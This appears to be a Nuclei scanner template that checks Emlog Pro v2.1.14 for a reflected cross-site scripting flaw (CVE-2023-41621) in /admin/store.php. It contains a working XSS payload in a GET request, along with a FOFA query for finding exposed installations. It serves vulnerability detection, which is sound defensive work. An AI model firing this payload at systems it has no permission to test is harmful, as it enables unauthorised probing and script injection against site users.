id: CVE-2023-41621 info: name: Emlog Pro v2.1.14 - Cross-Site Scripting author: ritikchaddha severity: medium description: | Cross Site Scripting (XSS) vulnerability in Emlog Pro v2.1.14 via /admin/store.php. impact: | Successful exploitation could lead to unauthorized access or data theft. remediation: | Update Emlog Pro to the latest version to mitigate the XSS vulnerability (CVE-2023-41621). reference: - https://github.com/GhostBalladw/wuhaozhe-s-CVE/blob/main/CVE-2023-41621 - https://nvd.nist.gov/vuln/detail/CVE-2023-41621 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-41621 cwe-id: CWE-79 epss-score: 0.00046 epss-percentile: 0.15636 cpe: cpe:2.3:a:emlog:emlog:2.1.14:*:*:*:pro:*:*:* metadata: vendor: emlog product: emlog max-request: 1 fofa-query: title="emlog" tags: cve,cve2023,emlog,xss http: - raw: - | GET /admin/store.php?"onmouseover='alert(document.domain)'bad=" HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: response words: - "onmouseover='alert(document.domain)'bad=" - "emlog" condition: and case-insensitive: true - type: word part: header words: - text/html - type: status status: - 200 # digest: 490a00463044022002fc85dd44cfcfe59e01d0f0d1c4012fbe34b31679eaf7caf8723b7fc34c4a4b022011e044463412c2932561607ffdda64af6693273c24498a4c5ac1d8797bbbc517:922c64590222798bb761d5b6d8e72950